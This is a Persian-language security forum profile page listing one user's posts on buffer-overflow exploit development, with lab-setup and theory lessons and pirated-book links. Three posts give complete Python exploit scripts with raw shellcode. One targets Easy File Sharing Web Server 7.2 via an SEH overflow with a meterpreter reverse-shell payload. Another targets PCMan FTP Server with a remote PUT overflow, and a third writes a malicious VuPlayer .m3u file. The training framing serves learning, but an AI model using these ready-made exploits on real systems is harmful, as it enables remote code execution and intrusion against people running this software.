رفتن به مطلب
شما به عنوان یوزر میهمان وارد شده اید. جهت استفاده از تمامی امکانات لطقا وارد حساب کاربری خود شوید.

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

XoDiAK

Retired Admin
  • تعداد ارسال ها

    12
  • تاریخ عضویت

  • آخرین بازدید

اعتبار در سایت

0 Neutral

درباره XoDiAK

  • تاریخ تولد ۹۹/۰۸/۰۵

Converted

  • Name
    آرش
  • Main os
    Debian
  • Programming language
    خیر
  1. اسیب پذیری بافر اورفلو در برنامه Easy File Sharing Web Server 7.2 https://packetstormsecurity.com/files/138589/Easy-File-Sharing-Web-Server-7.2-SEH-Buffer-Overflow.html https://cxsecurity.com/issue/WLB-2016090019 #!/usr/bin/python # Exploit Title: Easy File Sharing Web Server 7.2 SEH Buffer Overflow (EggHunter) # Date: 2016/8/31 # Exploit Author: Iran Cyber Security Group # Vendor Homepage: http://www.sharing-file.com # Software Link: http://www.sharing-file.com/efssetup.exe # Version: 7.2 [LATEST] # Tested on: Microsoft Windows 7 Professional x86 [should Work On The Other Operating Systems] # CVE : N/A # Usage : python exploit.py [iP or Domain] # Discovered By Arash Khazaei (AKA XoDiAK) # Greetz To Iran Cyber Members & My Friends import sys,socket from struct import pack HOST = sys.argv[1] PORT = 80 # msfvenom -p windows/meterpreter/reverse_tcp -b '\x2f\x5c' -i 2 -f c 335 Byte # Replace It With Your Own Shellcode ! shellcode = ("w00tw00t" + "\xd9\xc9\xbf\x35\xfe\x35\x6e\xd9\x74\x24\xf4\x5e\x29\xc9\xb1" "\x4e\x31\x7e\x17\x83\xc6\x04\x03\x4b\xed\xd7\x9b\x6a\xff\xc1" "\x10\xa8\xf4\xa8\xf1\x79\x4b\x8d\xf4\xcf\x36\xbf\xbe\x1e\x4d" "\xd8\x43\x1a\xa9\x5b\x81\x1f\xdd\x18\x78\xb2\x84\x32\xfb\x61" "\x03\x6f\x9e\xe5\x0f\x3d\x70\x9b\xbb\xd1\x2e\x81\x1c\xa6\x79" "\x74\x27\x17\xde\x04\x4b\x10\x89\x6b\xd3\xe4\xc0\x6c\x47\x32" "\xf4\x44\xeb\x7e\x1e\xd7\x62\x4c\x56\x0f\x58\x2e\x1a\x12\xc9" "\x0e\x12\x81\x30\xc9\x30\x3c\x76\xc0\x7a\xc0\xe0\x3b\xba\x6f" "\xfc\x5b\xe3\x3f\x1c\xa6\x37\x3d\xf5\x6b\xf3\x1a\xe0\x82\x85" "\xc8\xee\xce\xc8\xa2\xf9\x0e\x84\xe3\xac\x36\xe6\x3b\xc0\xe7" "\x61\xc1\xd3\xef\xf1\x4e\xc3\xde\xfd\xc7\x77\x5b\x51\xbc\xab" "\x2d\xb9\x65\x03\xc1\x01\x47\xbe\x50\xe2\xfc\x96\x96\xab\xd3" "\xf8\x53\x15\x69\xc6\xcd\x34\xdb\xd3\xcd\xcc\xdd\x02\x24\x31" "\x9f\xc0\xce\x41\x53\xf0\xe0\xb1\xd7\x96\xfc\x16\xe4\x10\xba" "\xd0\xd0\x10\x02\x40\xdc\x33\x9d\xb5\x35\xbb\x3f\x4f\x93\x11" "\x9a\x16\x63\x1b\x60\xa1\xab\x5e\x05\xf2\x7c\x02\x57\x99\x90" "\x88\x4d\xcf\x60\x3a\x9f\x77\x8a\x9e\xff\x1c\x91\x61\xec\x5e" "\xd4\x08\x54\x76\xfb\xdb\x45\xda\x8f\x01\xba\xed\x01\xef\x09" "\xc1\x5d\x8f\x2b\x24\x69\xc0\xbf\x44\x03\x6e\x62\x7c\x39\x6a" "\xab\x18\x70\xe5\xff\xe6\x33\x3b\x2b\x37\xf1\xb3\x92\xd6\x59" "\xcc\xc8\xca\x8d\x9d\x34\xf9\x89\xf7\x26\xbc\x60\xa1\xdf\xcb" "\xa8\x9d\xd2\x9f\x33\x5a\x48\xb2\x8d\xc5\xaa\x9f\x3c\x37\x0b" "\x98\x35\x70\x3b\xe0") # Padding ! junk = "A" * 4061 # Next SEH nseh = "\xeb\x06\x90\x90" # 0x1000108b [imageLoader.dll] POP POP RET seh = pack('<L', 0x10018848) # Egg Hunter 32 Byte Tag = w00tw00t egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") exploit = junk + nseh + seh + egghunter + shellcode + "\x90"*(len(junk)-4-4-32-8-335-5000) try: s = socket.socket() s.connect((HOST, PORT)) s.send("GET " + exploit + " HTTP/1.0\r\n\r\n") s.close() except: print "Can't Connect To Web Server ! Is it up ?" print "Evil Buffer Sended Successfully!" EFS Web Server 7.2. SEH Overflow (EggHunter).zip
  2. سلام خدمت شما استاد گرامی . یه سوال از خدمتتون دارم ایا کتاب " اموزش پیشرفته متاسپلویت" سایت نت اموزشکه تو چند فصلش کامل اموزش فازینگ و اکسپلویتینگ میپردازه به نظر شما من که علاقه دارم به این مقوله مفید و واسه شروع خوبه تهیه و کار کنم؟ اگه شما یا کسی هم کتابشو داشته باشه تو انجمن بذاره عالی میشه و ممنون میشیم با تشکر
  3. XoDiAK

    Buffer Overflow And Exploit Developing Training

    با سلام خدمت همه ی اعضا در این قسمت از اموزش همونطور که در پست اول گفته شده بود اموزش اکسپلویت و سوءاستفاده از اسیب پذیری بافر اورفلو به صورت ریموت یا از راه دور قرار گرفته شه ! در این اموزش ما یک FTP Server رو انالیز و اکسپلویت میکنم . اموزش در ۲۷ دقیقه به تصویری . حجم‌: ۳۶.۵ مگابایت امیدوارم از اموزش لذت ببرید انتقادی پیشنهادی درخواستی داشتید در پ.خ درمیون بزارید حتما . لینک دانلود : https://mega.nz/#!cF4yhCCB!0EE8rQR9tnkhqClxy8eaQrErS3f43uMdAz_QsNm0P6o اکسپلویت کامل شده : #!/usr/bin/python #[+] Exploit Title: PCMANFtp Server (PUT) Command Buffer Overflow #[+] Date: 31/8/2016 #[+] Exploit Author: Iran Cyber Security Team #[+] Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z #[+] Version: 2.49 #[+] Tested on: Windows 7 Professional X86 #Reference : https://www.exploit-db.com/exploits/39662 #[+] CVE : N/A # Usage : PcManftp.py [iP Address] import socket,sys HOST = sys.argv[1] PORT = 21 junk = "A"*2007 # Junk A # msvcrt.dll 0x77A2B391 FFE4 JMP ESP eip = "\x91\xB3\xA2\x77" # Calc.exe Universal Shellcode ! evil = ("\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x53\x52\x31\xc9\x51\xb9\x78\x65\x63\x61\x51\x83\x6c\x24\x03\x61\x68\x57\x69\x6e\x45\x54\x53\xff\xd2\x83\xc4\x08\x59\x50\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x31\xdb\x89\xe3\x31\xc9\x41\x51\x53\xff\xd0\x83\xc4\x10\x5a\x5b\x31\xc9\xb9\x65\x73\x73\x61\x51\x83\x6c\x24\x03\x61\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x53\xff\xd2\x31\xc9\x51\xff\xd0") exploit = junk + eip + "\x90"*50 + evil s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Create Socket s.connect((HOST,PORT)) # connecting To FTP Server s.recv(1024) # Read Banner FTP s.send('USER anonymous\r\n') # UserName Input s.recv(1024) # Recv Password Input Message s.send('PASS \r\n') # Password Input s.recv(1024) # Recv Welcome Message s.send('PUT '+ exploit + '\r\n') # Sending Buffer ! s.close() # Socket Close print "Evil Buffer Sended Successfully! To " + sys.argv[1]
  4. XoDiAK

    کتاب Gray Hat Python

    کتاب Gray Hat Python اموزش دیباگینگ و انالیز برنامه ها و اکسپلویت نویسی در پایتون ! رمز : iran-cyber.net Gray Hat Python.rar
  5. XoDiAK

    Buffer Overflow And Exploit Developing Training

    تمامی پارت ها برای دانلود ! هر پارت 10 مگ ویدیو بسیار کامل به مدت 45 دقیقه کامل برای Extract از اخرین نسخه Winrar استفاده کنید ! رمز : iran-cyber.net امیدوارم خسته نشید ! https://mega.nz/#F!gRh0mTLQ!TQ_AtxfUXP3We3aJo9rDMA اکسپلویت کامل شده : #!/usr/bin/python #[+] Exploit Title: VuPlayer ('.m3u') Local Buffer Overflow #[+] Date: 26/8/2016 #[+] Exploit Author: Iran Cyber Security Team #[+] http://vuplayer.com/ #[+] Software Link: https://www.exploit-db.com/apps/39adeb7fa4711cd1cac8702fb163ded5-vuplayersetup.exe #[+] Version: 2.49 #[+] Tested on: Windows 7 Professional #[+] CVE : N/A #Reference : https://www.exploit-db.com/exploits/13756/ import sys junk = "A"*1012 # JMP ESP BASS.DLL 0x1010539F eip = "\x9F\x53\x10\x10" # NOPS nop = "\x90"*50 # msfvenom -p windows/exec CMD="calc.exe" -b "\x00\x09\x0a\x0d\x1a" -f c buf = ("\xda\xdd\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1\x31\xba\xb3\x98\xc4" "\xb4\x31\x55\x18\x83\xed\xfc\x03\x55\xa7\x7a\x31\x48\x2f\xf8" "\xba\xb1\xaf\x9d\x33\x54\x9e\x9d\x20\x1c\xb0\x2d\x22\x70\x3c" "\xc5\x66\x61\xb7\xab\xae\x86\x70\x01\x89\xa9\x81\x3a\xe9\xa8" "\x01\x41\x3e\x0b\x38\x8a\x33\x4a\x7d\xf7\xbe\x1e\xd6\x73\x6c" "\x8f\x53\xc9\xad\x24\x2f\xdf\xb5\xd9\xe7\xde\x94\x4f\x7c\xb9" "\x36\x71\x51\xb1\x7e\x69\xb6\xfc\xc9\x02\x0c\x8a\xcb\xc2\x5d" "\x73\x67\x2b\x52\x86\x79\x6b\x54\x79\x0c\x85\xa7\x04\x17\x52" "\xda\xd2\x92\x41\x7c\x90\x05\xae\x7d\x75\xd3\x25\x71\x32\x97" "\x62\x95\xc5\x74\x19\xa1\x4e\x7b\xce\x20\x14\x58\xca\x69\xce" "\xc1\x4b\xd7\xa1\xfe\x8c\xb8\x1e\x5b\xc6\x54\x4a\xd6\x85\x32" "\x8d\x64\xb0\x70\x8d\x76\xbb\x24\xe6\x47\x30\xab\x71\x58\x93" "\x88\x8e\x12\xbe\xb8\x06\xfb\x2a\xf9\x4a\xfc\x80\x3d\x73\x7f" "\x21\xbd\x80\x9f\x40\xb8\xcd\x27\xb8\xb0\x5e\xc2\xbe\x67\x5e" "\xc7\xdc\xe6\xcc\x8b\x0c\x8d\x74\x29\x51") # Putting All Together .. exploit = junk + eip + nop + buf f = open('evil.m3u','w') f.write(exploit) f.close print "File Name : " + sys.argv[0] print "Exploit Successfully Generated !"
  6. XoDiAK

    Buffer Overflow And Exploit Developing Training

    قبل از هر چیز نیازه که ما درک و اشنایی از ثبات ها یا رجیستر های CPU داشته باشیم ما در عمل اکسپلویتینگ باید به چند تا از ثبات ها که توجه زیادی داشته باشیم که 2 تا از مهمترین ها رجیستر های ESP و EIP هستن. خب حالا این 2 ثبات چیکار میکنن ؟ ESP : ثبات ESP به بالای ترین نقطه Stack اشاره میکنه ! EIP : به ادرس بعدی که باید اجرا بشه اشاره میکند. خوب حالا فرض کنید برنامه ورودی داشته باشه مثلا نام که 256 بایت ورودی میگیره و اون رو خروجی میده رو کنسول یا در حالات دیگه ! حالا اگر ما به این برنامه 257 بایت یا بیشتر ورودی بدیم چه اتفاقی میفته ؟ برنامه کرش میکنه و طبق 256 بایت حداکثر تعین شده باشه ما اگر 264 بایت به برنامه بدیم ادرس EIP رو میتونیم تغییر بدیم (توجه داشته باشید که 4 بایت اول رو رجیستر EBP نگه میداره) خوب حالا که ما میتونیم EIP رو تغییر بدیم یعنی میتونی ادرس رو به هر جا از برنامه تغییر بدیم و برنامه رو کنترل کنیم . حال ما که دسترسی کامل به EIP داریم اگر بیایم ادرس رو به یک JMP ESP بفرستیم باعث میشه برنامه به سمت بالاترین نقطه استک فرستاده بشه و ما میایم استک رو با شل کد (کد مخربی که به زبان ماشین نوشته شده و باعث اجرای یک دستور خاص میشود !) خودمون پر میکنیم و خط به خط شل کد ما اجرا میشه و باعث میشه ما دسترسی از شل یا در سطح های بالاتر حتی باعث گرفتن دسترسی روت در سیستم میشه ! پ.نـ : توجه داشته باشید استک طبق استاندارد LIFO یا Last-In-First-Out کار میکند یعنی : LIFO کوتاه‌شدهٔ عبارت Last In First Out (آخرین ورودی از همه زودتر خارج می‌شود) است. این سیاست اساس کار پشته‌ها را تشکیل می‌دهد و به مفهوم آن است که آخرین دادهٔ ذخیره شده در پشته، نخستین داده‌ای است که بازیابی می‌شود. خب واسه این پست کافیه به نظرم پست بعدی انشالله به صورت تصویری همین تئوری رو بهتون نشون میدم!
  7. XoDiAK

    Buffer Overflow And Exploit Developing Training

    قبل از هر چیز ما باید Lab یا ازمایشگاه خودمون رو برای تست نفوذ و اکسپلویت نویسی اماده کنیم خب یکی از اصلی ترین نیاز های ما یک ماشین مجازی برای استفاده وجلوگیری از اسیب رسیدن به سیستم اصلی میباشد که پیشنهاد میکنم از یک ویندوز به صورت مجازی و از برنامه ی Virtual Box استفاده کنید که البته بر عکس این داستان هم مشکلی نداره فقط باید مراقب باشید! دومین چیز و یکی از مهم ترین ها Immunity Debugger هست که ما با این برنامه خیلی کار داریم و شما میتونید این برنامه رو از سایت زیر دانلود کنید : http://debugger.immunityinc.com/ID_register.py نیازی به وارد کردن اطلاعات واقعی نیست برای دانلود ! بعد از نصب دیباگر , پلاگین Mona.py که ضمیمه شده را دانلود کنید و به محل نصب برید و در پوشه ی PyCommands کپی کنید که در اینده از اون استفاده های زیادی میکنیم ! توجه داشته باشید دیباگر روی ماشین مجازی ویندوز نصب کنید ! خوب ازمایشگاه یا Lab اماده است برای شروع کار . تو ارسال پست بعد با دیباگر کار کنید و باهاش ور برید که باهاش اشنا بشید!
  8. XoDiAK

    دانلود کتاب Hacking The Art Of Exploitation 2nd Edition

    دانلود کتاب Hacking The Art Of Exploitation 2nd Edition یکی از کتاب های عالی در زمینه اکسپلویت نویسی رمز :‌ iran-cyber.net حجم‌:‌3.5 مگابایت Hacking The Art Of Exploitation 2nd Edition[iran-cyber.net].zip
  9. XoDiAK

    Buffer Overflow And Exploit Developing Training

    با سلام و درود فراوان به اعضای انجمن . در این تاپیک به صورت تصویری اموزش اکسپلویت اسیب پذیری های لوکال و ریموت اسیب پذیری های بافر اورفلو قرار میگیرد و سعی میشود به صورت هفتگی یک اموزش قرار میگیرد . سر فصل ها : کشف اسیب پذیری و اکسپلویت اسیب پذیری در برنامه ی ویندوزی (لوکال) کشف اسیب پذیری و اکسپلویت اسیب پذیری در برنامه ی ویندوزی 2 ( ریموت) کشف اسیب پذیری و اکسپلویت اسیب پذیری در برنامه ی ویندوزی و بایپس SEH در برنامه (لوکال) کشف اسیب پذیری و اکسپلویت اسیب پذیری در برنامه ی ویندوزی و بایپس DEP و ASLR (لوکال و ریموت) و .... سرفصل به مرور زمان اپدیت میشود ! و اما پیشنیاز های این اموزش ها : درک کامل از CPU و Memory و نحوه کار آن یک ماشین مجازی ویندوز XP یا 7 (میتواند سیستم عامل اصلی باشد و ماشین کالی به صورت مجازی باشد در هر حال توصیه نمیشود) اشنایی با یکی از زبان های Perl , Python , PHP اشنایی با دیباگر ها ( Ollydbg یا Immunity Debugger)
  10. XoDiAK

    Offensive Security Cracking The Perimeter Ebook

    دانلود کتاب Offensive Security Cracking the Perimeter پسورد : iran-cyber.net Offensive.Security.BackTrack.to.the.Max.Cracking.the.Perimeter.v1.0[iran-cyber.net].rar

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...